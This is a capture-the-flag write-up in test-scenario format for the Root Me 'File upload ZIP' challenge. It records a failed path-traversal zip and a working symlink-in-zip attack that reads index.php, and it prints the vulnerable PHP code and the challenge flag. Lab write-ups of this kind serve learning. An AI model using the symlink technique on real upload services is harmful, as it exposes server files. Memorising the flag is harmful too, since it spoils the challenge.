## Version 2.0
## language: en

Feature: File upload zip-Root Me
  Site:
    www.root-me.org
  Category:
    Web Server
  User:
    dianaosorio97
  Goal:
    Read index.php file.

  Background:
  Hacker's software:
    | <Software name> | <Version>       |
    | Ubuntu          | 18.04.1 (64-bit)|
    | Gogle Chrome    | 71.03578.80     |
  Machine information:
    Given I am accessing the challenge page
    """
    https://www.root-me.org/es/Challenges/Web-Servidor/File-upload-ZIP
    """
    And I see the problem statement
    """
    Your goal is to read index.php file.
    """
    Then I selected the challenge button to start

  Scenario: Fail:Create archive with directory traversal
    Given I access the section to solve the challenge
    And I see that there is a section to upload zip files
    Then I created a file that directory traversal
    And I used a python script to create the zip file
    """
    https://github.com/Neohapsis/evilarc/blob/master/evilarc.py
    """
    Then I wrote the command to generate the file
    """
    ./evilarc.py index.php -o unix -d 3
    """
    And I got a zip file
    And I uploaded the file on the page and unzipped it
    Then I see the message 403 forbidden
    And I tried to change the number of directories
    But I got the same message

  Scenario: Success:created link
    Given linux allows you to create symbolic links to directories
    """
    ln -s
    """
    Then I tried several directories and the follow one was the right one
    """
    ../../../index.php
    """
    And I use the command and the directory to create a link in file.txt
    """
    ln -s ../../../index.php file.txt
    """
    And I compressed the file
    """
    zip -y test.zip file.txt
    """
    Then I uploaded the file on the page and unzipped it
    And I went to the file.txt file
    And I could see the content of index.php
    """
    if ($zip->open($uploadfile)) {
            // Don't know if this is safe, but it works, someone told me
            the flag is N3v3r_7rU5T_u5Er_1npU7 , did not understand
            what it means
            exec("/usr/bin/timeout -k2 3 /usr/bin/unzip
            '$uploadfile' -d '$uploaddir'", $output, $ret);
            $message = "<p>File unzipped
            <a href='".$uploaddir."'>here</a>.</p>";
        $zip->close();
        }
    """
    Then I could see the code to solve the challenge
    """
    N3v3r_7rU5T_u5Er_1npU7
    """
    Then I entered the code as an answer
    And I solve the challenge
